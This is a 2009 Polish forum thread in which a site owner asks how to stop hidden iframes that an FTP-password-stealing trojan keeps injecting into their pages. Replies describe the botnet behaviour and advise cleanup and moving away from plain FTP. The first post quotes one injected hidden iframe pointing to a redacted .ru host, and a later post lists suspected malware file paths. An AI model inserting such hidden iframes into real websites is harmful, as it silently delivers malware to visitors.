Pokaż wyniki 1 do 8 z 8

Temat: Zabezpieczenie przed iframe

  1. #1
    Zarejestrowany
    Nov 2008
    Postów
    7

    Domyślnie Zabezpieczenie przed iframe

    Witam czy jest jakiś kod który by nie pozwalał wyświetlić iframe na mojej stronie zmieniałem hasła , zmieniałem klienty fttp , zmieniałem cmsy , skanowałem komputer i nic nie pomogło kody są w tym stylu

    Kod:
    <iframe src="http://[deleted].ru:8080/index.php" width=169 height=189 style="visibility: hidden"></iframe>
    Proszę o pomoc
    Ostatnio edytowane przez Mad_Dud : 07-27-2009 - 21:55 Powód: usunięto adres

  2. #2
    Zarejestrowany
    Oct 2007
    Postów
    4

    Domyślnie

    Masz tutaj analize trojana ktory dokleja kod http://novirusthanks.org/blog/2009/0...hidden-iframe/.
    Musisz wykonac kilka czynnosci:
    • przeskanowac kompa programem antywirusowym z ktorego laczysz sie na ftp serwera
    • uaktualnienie programu ktorym laczysz sie z ftp
    • zmiana hasel do ftp
    • usuniecie linkow IFRAME z plikow na ftp

  3. #3
    Zarejestrowany
    Nov 2008
    Postów
    7

    Domyślnie

    Robiłem już to dużo razy ale kod po 2 miechach przychodził :/
    Dzięki za zainteresowanie naprawdę ciekawa strona
    @Edit
    Mam chyba jakiś inny wirus bo tych plików nie mam

    Kod:
    C:\WINDOWS\system32\wbem\grpconv.exe
    C:\WINDOWS\Temp\wpv331238107706.exe
    C:\WINDOWS\Temp\wpv761238313566.exe
    C:\WINDOWS\system32\crypts.dll
    C:\Documents and Settings\user\user.exe
    Ostatnio edytowane przez T O M E K : 07-27-2009 - 18:47

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jest wirusik/trojan co kradnie hasla do FTP i wtedy ladnie modyfikuje stronki wstawiajac IFRAME'y - niedawno takie cos obserwowalem, polaczenia co pare minut z roznych adresow IP, nigdy sie IP nie powtorzylo...

    1. Jakis IP sie laczy jako istniejacy user i pobiera od razu wlasciwy plik i logout
    2. pare sekund pozniej polaczenie jako ten sam user z innego IP, upload podmienionego pliku, logout
    3. akcja powtarza sie pare razy, zmieniajac iframe...

    Widac botnet majacy 'swiadomosc' tego co robia zombie, w jakis sposob musi dzielic informacje... calkiem mozliwe ze to botnet wynajmowany 'na godziny' bo w ciagu 15 minut plik byl zmieniany 8 razy, za kazdym razem wstawiajac inny iframe do innego malware. Technicznie mowiac jestem pod wrazeniem :P
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Nov 2008
    Postów
    7

    Domyślnie

    Coraz więcej osób ma z tym problemy jak się czyta w necie ,znalazłem spis tych gówien
    http://www.malwareurl.com/search.php...verse=on&as=on
    Nie wiem co robić czy to koniec ery bezpiecznych stron ?
    Ostatnio edytowane przez T O M E K : 07-28-2009 - 18:16

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jesli ktos do aktualizacji plikow uzywa FTP to nie mozna mowic o bezpiecznych stronach

    EDIT:
    Zabezpieczac to trzeba sie nie przed IFRAME ale przed uzywaniem FTP, bo to jest glowny sposob w jaki te iframe'y trafiaja na serwery... Probujesz naprawiac symptomy zamiast zajac sie przyczynami problemu
    Ostatnio edytowane przez TQM : 07-28-2009 - 20:17
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Zarejestrowany
    Nov 2008
    Postów
    7

    Domyślnie

    Może i racja domyślam się że trzeba skorzystać z sFTP ale nie mogę znaleźć artykułu podrzuci ktoś linka ? tylko po polsku
    ( w mozilli jest taka opcja ale nie umiem się połączyć)
    Ostatnio edytowane przez T O M E K : 07-30-2009 - 08:50

  8. #8
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Zamykam.
    off-topic się robi.

    PS. W celu skorzystania z innych protokołów wymiany plików, skontaktuj się z administratorem.

Podobne wątki

  1. HTML:IFrame-EJ [Trj]
    By j5zz in forum Wirusy/Konie trojańskie
    Odpowiedzi: 0
    Autor: 05-25-2009, 13:47
  2. ochrona przed podszywaniem
    By yzihs in forum Security
    Odpowiedzi: 3
    Autor: 05-10-2009, 13:19
  3. zabezpieczenie sieci przed hackingiem
    By sonorus in forum Hacking
    Odpowiedzi: 4
    Autor: 03-03-2009, 17:13
  4. Obrona przed arpspoofingiem.
    By master614 in forum Security
    Odpowiedzi: 8
    Autor: 10-07-2008, 16:23
  5. zabezpieczenie przed snifingiem :/
    By k_enhap in forum Security
    Odpowiedzi: 8
    Autor: 09-19-2008, 04:06

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj